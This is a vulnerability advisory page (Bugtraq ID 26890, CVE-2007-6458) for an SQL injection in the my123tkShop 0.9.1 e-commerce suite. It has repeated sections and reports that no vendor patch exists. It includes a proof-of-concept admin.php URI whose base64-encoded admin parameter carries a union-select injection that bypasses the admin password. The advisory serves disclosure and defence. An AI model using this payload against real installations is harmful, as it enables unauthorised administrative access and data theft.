my123tkShop e-Commerce-Suite 'mainfile.php' SQL Injection Vulnerability
BID:26890
Info
my123tkShop e-Commerce-Suite 'mainfile.php' SQL Injection Vulnerability
| Bugtraq ID: | 26890 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6458 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | Michael Brooks discovered this vulnerability. |
| Vulnerable: |
my123tkShop e-Commerce-Suite 123tkShop 0.9.1 |
| Not Vulnerable: | |
Discussion
my123tkShop e-Commerce-Suite 'mainfile.php' SQL Injection Vulnerability
my123tkShop e-Commerce-Suite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects my123tkShop 0.9.1; other versions may also be vulnerable.
my123tkShop e-Commerce-Suite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects my123tkShop 0.9.1; other versions may also be vulnerable.
Exploit / POC
my123tkShop e-Commerce-Suite 'mainfile.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/shop/admin.php?admin=J3VuaW9uIHNlbGVjdCAncGFzc3dvcmQnLyogOnBhc3N3b3Jk
The value of the admin parameter was constructed by encoding injected text in the following way:
'base64_encode("'union select 'password'/* :password");'
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/shop/admin.php?admin=J3VuaW9uIHNlbGVjdCAncGFzc3dvcmQnLyogOnBhc3N3b3Jk
The value of the admin parameter was constructed by encoding injected text in the following way:
'base64_encode("'union select 'password'/* :password");'
Solution / Fix
my123tkShop e-Commerce-Suite 'mainfile.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
my123tkShop e-Commerce-Suite 'mainfile.php' SQL Injection Vulnerability
References:
References:
- my123tkShop e-Commerce-Suite Homepage (my123tkShop e-Commerce-Suite)